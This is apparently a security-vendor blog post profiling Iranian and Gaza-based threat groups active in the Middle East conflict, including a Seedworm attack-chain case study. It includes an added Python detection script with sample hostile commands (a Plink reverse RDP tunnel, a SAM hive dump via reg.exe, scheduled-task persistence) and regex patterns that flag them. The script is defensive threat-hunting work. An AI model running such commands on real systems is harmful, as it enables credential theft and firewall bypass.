
Is Cyber the Next Stage of War in the Middle East Conflict?

As clashes continue in the Middle East, who are the cyber actors to be aware of?

The conflict in the Middle East continues to make headlines, as it has done since the October 7, 2023 Hamas attacks against Israel, which led to Israel retaliating with an ongoing onslaught on the Gaza Strip. The situation heated up further in recent weeks, with Israel and Iran both bombing each other’s territories, leading to U.S. intervention when it bombed Iran’s nuclear facilities, attempting to disrupt or destroy Iran’s nuclear program. Shortly after, U.S. President Donald Trump announced a ceasefire between the two countries, which, at time of writing, appears to be tentatively holding. 

While most of the attention has focused on the physical actions occurring in this war, such as bombing, aid blockades and destruction, another potential front in the war is cyber space, an increasingly common arena in modern conflicts. Both Israel and Iran, two of the main players in the current hostilities, have a history of carrying out destructive cyber attacks, including against each other. 

We published a whitepaper last year discussing the cyber activity we typically see emanating from this region titled Conflict in the Middle East: An Overview of Cyber Threat Actors and Risks.   

One of the most infamous cyber incidents to take place in this region was the deployment of the Stuxnet worm, which was designed to break laboratory equipment used by Iranian scientists to enrich uranium at the Natanz facility in Iran. This facility was one of the targets bombed by the U.S. in its recent strikes against Iran. Stuxnet was among the first known major nation-state cyberattacks that demonstrated hackers’ ability to manipulate and even destroy physical equipment: it was designed to cause the spinning motors at the bottom of Natanz's enrichment centrifuges to shatter. It was first publicly documented by researchers at Symantec in 2010, after the worm spread outside of the Natanz facility and was found on private networks. Stuxnet has long been suspected to be the work of the U.S. and Israel, though it has never been claimed by either country. Given that Stuxnet was only discovered after penetrating private networks, it is quite possible that cyber operations are currently being leveraged by and against these governments without our knowledge.

Recent media reports indicate potential cyber warfare impacting the region, including an attack by pro-Israel hackers dubbed Predatory Sparrow on the Iranian crypto exchange Nobitex, in which the attackers drained $90 million of cryptocurrency from the exchange. There were also reports that the Iranian group Damselfly was carrying out a targeted phishing campaign focused on high-profile Israeli individuals, particularly prominent academics, journalists, and security researchers (see the Damselfly profile below).

Damselfly is just one of the key cyber actors who are most likely to be active in the current conflict, potentially targeting the networks of significant institutions in other nations for espionage, disruptive or destructive purposes. 


Key Actors

We have reasonably good insight into some of the main Iranian actors and their activity. Iranian threat actors have become increasingly proficient in recent years. Not only has their malware improved, but they’ve also developed a strong social engineering capability that they’ve leveraged against targets of interest, even mounting digital honeytrap operations.

One of the hallmarks of Iran’s operations in cyberspace is that it periodically mounts destructive attacks against organizations in countries it deems hostile, which at the moment would obviously include the U.S., and its long-standing foe Israel. That creates a risk for organizations in those countries because these attacks are about sending a message rather than stealing information, which means that any organization in the country targeted could be in the firing line.

There are a couple of Iranian threat actors worth noting that are among the most active at the moment, the first of which is Seedworm (aka MuddyWater, Temp Zagros, Static Kitten). Seedworm is a long-standing Iranian group, which usually mounts classic espionage attacks for the purposes of spying and information gathering. Active since 2017, Seedworm has been described by CISA as “a subordinate element within the Iranian Ministry of Intelligence and Security.” Seedworm originally focused on victims in the Middle East but later broadened its scope to target telecommunications, defense, local government, and oil and natural gas organizations in Asia, Africa, Europe, and North America. The group develops its own custom malware as well as using dual-use and living-off-the-land tools.

While originally focused on espionage, Seedworm has in recent times begun carrying out destructive attacks that masquerade as ransomware, either in collaboration with another threat group or through a sub-group within it. These attacks involve ransomware known as DarkBit and, while it does encrypt computers like regular ransomware, the attackers seem more interested in making a statement than collecting a ransom. Some of the ransom notes they’ve left have had an unusually political tone, implying the ransomware was deployed as retaliation rather than as a money-generating exercise.


Case Study: Seedworm targets smaller organizations

A recent campaign tentatively linked to Seedworm focused on smaller organizations, including organizations in the utility, transport, and manufacturing sectors outside the Middle East.

The attackers took advantage of compromised home routers that were infected with the Mirai malware. It isn’t clear if this access was purchased or if the infections were initiated by Seedworm itself, but it had access to numerous compromised home routers from which it attacked the victim organizations by proxying through them. These attacks did not come from Iranian IP addresses; they came from small routers in a whole range of countries. Seedworm used this network of hacked routers to scan for vulnerable IIS servers, and then used a variety of known vulnerabilities to gain access to these servers. Once on these servers, it used Plink, a legitimate off-the-shelf tool, to create a reverse RDP tunnel. Inbound RDP connections were blocked by the firewall, but Plink is able to create an outbound SSH connection back to the attacker, which is allowed, and that connection is then used to tunnel classic RDP traffic, bypassing the firewall.

Seedworm then sideloaded Brute Ratel, a commercial red-teaming and adversarial attack simulation tool, and used a scheduled task for persistence. The attackers used Brute Ratel to obtain credentials and, once they had them, began to move laterally to other machines, ultimately obtaining more credentials by dumping the SAM hive with reg.exe. Seedworm then gained access to file servers and SQL servers seeking data of interest. It launched SQL injection attacks across the internal network to gain access to the SQL servers.
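The chain above (web server spawning a shell, Plink reverse tunnel exposing RDP, SAM hive dump with reg.exe, scheduled-task persistence) leaves a recognizable footprint in process-creation telemetry. The following is an added detection example written for this post, not tooling from the Threat Hunter Team; the event format and the sample events are constructed, and the host names, paths and IP address are placeholders.

```python
import re

# Constructed sample process-creation events (simplified Sysmon-style fields):
# host|parent_image|image|command_line. Illustrative only, not real telemetry.
SAMPLE_EVENTS = [
    "web01|w3wp.exe|cmd.exe|cmd.exe /c whoami",
    "web01|cmd.exe|plink.exe|plink.exe -ssh -N -R 0.0.0.0:22222:127.0.0.1:3389 -l u -pw x 203.0.113.7",
    "web01|cmd.exe|reg.exe|reg.exe save HKLM\\SAM C:\\Windows\\Temp\\sam.hiv",
    "web01|cmd.exe|schtasks.exe|schtasks.exe /create /tn Updater /tr C:\\ProgramData\\svc.exe /sc onlogon",
    "fs01|explorer.exe|plink.exe|plink.exe -ssh -L 8080:intranet:80 admin@jumphost",
    "fs01|explorer.exe|reg.exe|reg.exe query HKLM\\SOFTWARE\\Microsoft\\Windows",
]

PLINK = re.compile(r"\bplink(?:\.exe)?\b", re.I)
# Plink remote forward: -R [listen-ip:]listen-port:host:port. Flag forwards that expose RDP (3389).
REVERSE_RDP = re.compile(r"(?:^|\s)-R\s+\S*:3389\b", re.I)
# reg.exe save of the SAM (or SECURITY/SYSTEM, needed to decrypt it) is a classic credential dump.
HIVE_DUMP = re.compile(r"\breg(?:\.exe)?\s+save\s+(?:hklm|hkey_local_machine)\\(?:sam|security|system)\b", re.I)
SCHTASK_CREATE = re.compile(r"\bschtasks(?:\.exe)?\s+/create\b", re.I)
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Each rule: (name, predicate over (parent_image, image, command_line)).
RULES = [
    ("IIS worker process spawned a shell",
     lambda p, i, c: p.lower() == "w3wp.exe" and i.lower() in SHELLS),
    ("Plink reverse tunnel exposing RDP",
     lambda p, i, c: bool(PLINK.search(i) or PLINK.search(c)) and bool(REVERSE_RDP.search(c))),
    ("Registry hive dump via reg.exe save",
     lambda p, i, c: bool(HIVE_DUMP.search(c))),
    ("Scheduled task created from a shell",
     lambda p, i, c: p.lower() in SHELLS and bool(SCHTASK_CREATE.search(c))),
]


def parse_event(line):
    """Split one pipe-delimited event into (host, parent_image, image, command_line)."""
    host, parent, image, cmd = line.split("|", 3)
    return host, parent, image, cmd


def detect(events):
    """Return one finding per (event, matched rule) as (host, rule_name, command_line)."""
    findings = []
    for line in events:
        host, parent, image, cmd = parse_event(line)
        for name, pred in RULES:
            if pred(parent, image, cmd):
                findings.append((host, name, cmd))
    return findings


if __name__ == "__main__":
    for host, name, cmd in detect(SAMPLE_EVENTS):
        print(f"[{host}] {name}: {cmd}")
```

Legitimate local forwards (`-L`) and read-only `reg query` calls in the sample set do not fire, so several of these findings on one host within a short window is the signal worth escalating.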

Figure 1. Seedworm attack chain

The attackers then installed ndisproxy on the web servers to mount an attacker-in-the-middle (AITM) attack in order to exploit and infect the actual victims of interest, such as government organizations that visit and use these private organizations’ services. In most cases, they weren’t interested in the infected victim; they were interested in using the access as a jumping-off point to gain access to another organization.

Some of the target organizations held key personal data of victims of interest, for example government officials. The attackers also appeared to be interested in digital certificates, which they stole to sign their own tools for use against other organizations. Transportation companies were also among the group’s targets. Iranian attack groups have historically been interested in the transport sector in order to track the movements of both goods and individuals, gaining insight into military equipment and high-value shipments, and, in some cases, for the purposes of foreign and domestic intelligence-gathering operations.

All of the infected organizations in this campaign were SMBs, in a variety of sectors and all based outside the Middle East. None of them were “typical” victims for Iranian threat groups, pointing to a widening scope in victims targeted by Seedworm.

Druidfly

Druidfly (aka Homeland Justice, Karma), which specializes in disk-wiping attacks, is another Iranian attack group to be aware of. It first came to public attention after a July 2022 wiper attack on multiple targets belonging to the government of Albania. The wiper left messages directed against the Mujahideen E-Khalq (MEK), an Iranian dissident organization based in Albania. Shortly afterward, a group calling itself Homeland Justice claimed credit for the attack.

In response to the attack, Albania broke off diplomatic relations with Iran. This triggered another wave of attacks in September 2022, apparently in retaliation for Albania publicly attributing the attacks to Iran. While Homeland Justice purported to be a hacktivist outfit, the FBI later established that “Iranian state cyber actors” were responsible for the attacks. 

Druidfly reappeared in 2023, when it began targeting Israel with a wiper called BibiWiper, seemingly named after Israeli Prime Minister Benjamin Netanyahu, whose nickname is “Bibi” (see the case study below).

Druidfly is currently active amidst the ongoing conflict and tensions in the region. The Threat Hunter Team tweeted on June 20, 2025, that we had seen a Druidfly wiper targeting organizations in Albania. The wiper was signed with a legitimate certificate, which was probably stolen. On the Monday following (June 23), it was reported in the media that public services in Albania’s capital Tirana had been disrupted by a cyber attack that took down the city’s official website and affected local government operations. Homeland Justice claimed credit for the attack and said it had taken down the city’s official website, exfiltrated data and wiped servers, citing the presence of MEK in the country as the reason for the attack.


Case Study: Druidfly attacks on Israeli targets

Following the escalation of the conflict in Gaza in 2023, Druidfly was linked to a series of wiper attacks against multiple targets in Israel. In this case, the attacks were carried out under a persona called Karma that purports to be a hacktivist group sympathetic to the Palestinian cause.

The wiper deployed in these attacks was called BibiWiper, seemingly named after Israeli Prime Minister Benjamin Netanyahu, whose nickname is Bibi. The wiper encrypted files on the hard disk before overwriting the master boot record (MBR) and crashing the computer. Efforts to restart the computer would fail because of the destruction of the MBR. Analysis of the wiper revealed clear anti-Israel messages within the wiper’s code. 

Figure 2: Message in BibiWiper code suggesting that Israel is not a country

Furthermore, analysis of BibiWiper by the Threat Hunter Team found clear similarities between it and wipers deployed by Druidfly during attacks against Albania in 2022 and 2023.

Tracing other tools used to initiate the BibiWiper attacks against Israel revealed the following overlap in tactics, techniques, and procedures between these attacks and earlier Druidfly attacks:

  • Deployment of HTTPSnoop malware prior to the wiping attacks, as seen in earlier Druidfly operations
  • Use of the remote desktop tools AnyDesk and ScreenConnect
  • Use of ReGeorg web shells


Damselfly

Damselfly (aka Charming Kitten, Mint Sandstorm) is an Iranian espionage group that has been active since 2014. It was initially known for targeting Israel with attacks before it broadened its focus to include the U.S. and other countries. While the group is principally known to be involved in intelligence gathering, members of the group are also known to have participated in extortion attacks. It has been linked by multiple vendors with Iran’s Islamic Revolutionary Guard Corps (IRGC).

In March 2022, Damselfly was one of several Iranian groups reported to have moved into mounting large-scale social engineering campaigns. Consistent features of these campaigns included the use of charismatic sock puppets, lures of prospective job opportunities, solicitation by journalists, and masquerading as think tank experts seeking opinions. The attackers leveraged networks such as LinkedIn, Facebook, Twitter, and Google.

Damselfly has also been linked to an attack targeting a nuclear security expert at a U.S.-based think tank in July 2023; attacks on Israel’s transportation, logistics, and technology sectors in November 2023; as well as a January 2024 campaign targeting individuals working on Middle Eastern affairs at universities and research organizations in Belgium, France, Gaza, Israel, the UK, and the U.S. The attackers in that campaign used bespoke phishing lures themed around the Israel-Hamas conflict to trick targets into downloading malware.

Most recently, Check Point reported that a new Damselfly campaign that began in mid-June 2025 targeted Israeli journalists, cyber security experts and computer science professors from leading Israeli universities with spear phishing campaigns in an attempt to steal credentials and multi-factor authentication codes in order to gain access to targets’ email accounts. Some of the victims were approached by attackers who posed as fictitious assistants to technology executives or researchers through emails and WhatsApp messages.


Mantis 

Active since at least 2014, Mantis (aka Desert Falcon, Arid Viper, APT-C-23) is an Arabic-speaking group that appears to be based in the Gaza Strip. The group is known to mount espionage attacks against targets in the government, military, media, financial, research, education, and energy sectors. Most of its attacks have been against organizations in the Middle East but it has, on occasion, attacked targets outside the region. It has also been known on occasion to target individuals or organizations within Gaza itself. While other vendors have linked the group to Hamas, the Threat Hunter Team cannot make a definitive attribution to any Palestinian organization.

The group mainly favors spear-phishing emails with malicious attachments or links to malicious files as its infection vector. Mantis uses custom malware and its most recent toolset includes the backdoors Trojan.Micropsia and Trojan.AridGopher. Micropsia is capable of taking screenshots, keylogging, and archiving certain file types using WinRAR in preparation for data exfiltration. However, its main purpose appears to be running secondary payloads for the attackers. AridGopher is a modular backdoor written in Go. It appears to be regularly updated and rewritten by the attackers, most likely to evade detection.

These tools were used in a Mantis attack in late 2022/early 2023 that targeted organizations within the Palestinian territories. The initial infection vector for this campaign remains unknown, but both the Micropsia and AridGopher malware were deployed in this attack. In one intrusion, the attackers deployed three distinct versions of the same toolset (that is, different variants of the same tools) on three groups of computers. Compartmentalizing the attack in this fashion was likely a precautionary measure. If one toolset was discovered, the attackers would still have a persistent presence on the target’s network.

If the Mantis operators are based within Gaza it is unlikely the group is operational at the moment given the blockade of the territory by Israel and limited internet access in the region. However, it’s not unusual for members of groups to be based outside the countries or regions they are operating on behalf of, which could be the case for Mantis operators, though we have no evidence of this.


What next?

As the conflict in the Middle East continues, the types of cyberattacks we are likely to see emanating from Iran, potentially directed at Israel but also against its backers such as the U.S., are probably going to be either espionage or disruption attacks. Seedworm, Damselfly and Druidfly are some of the most likely actors we could see venturing into this conflict, with the groups having the skills and experience to carry out potentially serious and destructive attacks.

Iranian actors’ skills at social engineering are something that organizations in Israel, the U.S., and other nations or organizations of interest should be aware of. Iranian threat actors also have a history of carrying out attacks at times when they know organizations' guard may be down, such as at the weekend or during public holidays, when activity would be more likely to pass unnoticed for a longer period of time. This was most clearly demonstrated during the Shamoon wiping attacks that targeted organizations in Saudi Arabia in 2012, 2016 and 2018, which mostly began on holidays or weekends. As we head into vacation season for many in the U.S., cyber teams should have their guard up, as threat actors may see this quieter time as a prime opportunity to get a grip on networks and potentially cause major disruption.


Further Reading

Learn more about these and other Middle Eastern threat actors in our comprehensive whitepapers:

About the Author

Threat Hunter Team

Symantec and Carbon Black

The Threat Hunter Team is a group of security experts within Broadcom whose mission is to investigate targeted attacks, drive enhanced protection in Symantec and Carbon Black products, and offer analysis that helps customers respond to attacks.
